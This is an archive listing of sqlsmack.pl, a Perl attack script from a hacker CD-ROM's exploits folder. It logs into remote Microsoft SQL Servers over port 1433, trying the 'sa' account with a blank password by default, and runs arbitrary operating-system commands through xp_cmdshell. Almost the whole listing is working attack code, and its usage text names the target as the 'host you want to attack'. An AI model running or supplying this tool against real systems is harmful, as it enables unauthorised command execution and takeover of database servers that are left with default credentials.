home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 15 / hacker15 / 15_H4CK3R#15.ISO / eploits / sqlsmack / sqlsmack.pl < prev   
Encoding:
Perl Script  |  2004-03-03  |  2.3 KB  |  106 lines
  1. #!/usr/bin/perl
  2. ###############
  3.  
  4. ##
  5. # MSSQL Access Via TCP/IP (tcp/1433) and DBI
  6. ##
  7.  
  8. use Getopt::Std;
  9. use DBI;
  10. use DBD::FreeTDS;
  11.  
  12.  
  13. sub usage {
  14.     print STDERR qq{
  15.  
  16. *- -- ---[ sqlsmack v$VERSION - H.D. Moore <hdmoore\@digitaldefense.net>
  17.  
  18. Usage: $0 -h <host> -c 'command'
  19.  
  20.     -h <host>       = host you want to attack
  21.     -d <database>    = the database to use (master)
  22.     -u <username>   = username to use (sa)
  23.     -p <password>   = password to use (blank)
  24.     -c <command>    = command to execute
  25.     -q <sql query>    = sql query (instead of command)
  26.     -P <port>       = alternative port to use (1433)
  27.     -W              = use command.com instead of cmd.exe
  28.     -v              = verbose
  29.     
  30. };
  31.     exit(1);
  32. }
  33.  
  34. ##                    ##
  35. #    MAIN STARTS HERE   #
  36. ##                    ##
  37.  
  38.  
  39. getopts("h:d:u:p:c:q:P:DWv", \%args);
  40.  
  41. $VERSION = "1.2";
  42.  
  43. # global options hash
  44. %options = ( "Query" => "SELECT 1 + 1",
  45.              "Database" => "master",
  46.              "Username" => "sa",
  47.              "Password" => "",
  48.              "Port" => 1433,
  49.              "CMD" => "cmd.exe",
  50.              "Verbose" => 0
  51.            );
  52.  
  53.  
  54. if(!defined($args{h})){usage();}else{$options{"Host"} = $args{h};}
  55.  
  56. # validate the port
  57. if(defined($args{P}))
  59.     if (int($args{P}) > 65535 || int($args{P}) <= 0)
  60.     { 
  61.         print "Invalid port specified.\n";
  62.         exit;
  63.     }
  64.     $options{"Port"} = $args{P};
  65. }
  66.  
  67. if(defined($args{u})){$options{"Username"} = $args{u}; }
  68. if(defined($args{p})){$options{"Password"} = $args{p}; }
  69. if(defined($args{W})){$options{"CMD"} = "command.com"; }
  70. if(defined($args{c})){$options{"Query"} = "EXEC master..xp_cmdshell '". $options{"CMD"} ." /c " . $args{c} . "'"; }
  71. if(defined($args{q})){$options{"Query"} = $args{q}; }
  72. if(defined($args{v})){$options{"Verbose"}++; }
  73.  
  74. if(defined($args{D}))
  75. {
  76.     print "----[ OPTIONS DUMP ]----\n";
  77.     foreach $key (keys(%options))
  78.     {
  79.         print "$key => ".$options{$key}."\n";
  80.     }
  81.     print "\n";
  82. }
  83.  
  84. # create the DSN connection
  85. $dsn = "DBI:FreeTDS:database=".$options{"Database"}.";host=".$options{"Host"}.";port=".$options{"Port"};
  86. $dbh = DBI->connect($dsn, $options{"Username"}, $options{"Password"});
  87.  
  88. if ($options{"Verbose"})
  89. {
  90.     print "Executing Query:  \"" . $options{"Query"} . "\"\n\n";
  91. }
  92.  
  93. # execute the query
  94. $sth = $dbh->prepare($options{"Query"});
  95. $sth->execute();
  96.  
  97. # retrieve the results
  98. while (@rs = $sth->fetchrow())
  99. {
  100.     print join(" ", @rs) . "\n";
  101. }
  102.  
  103. # disconnect
  104. $sth->finish();
  105. $dbh->disconnect();
  106.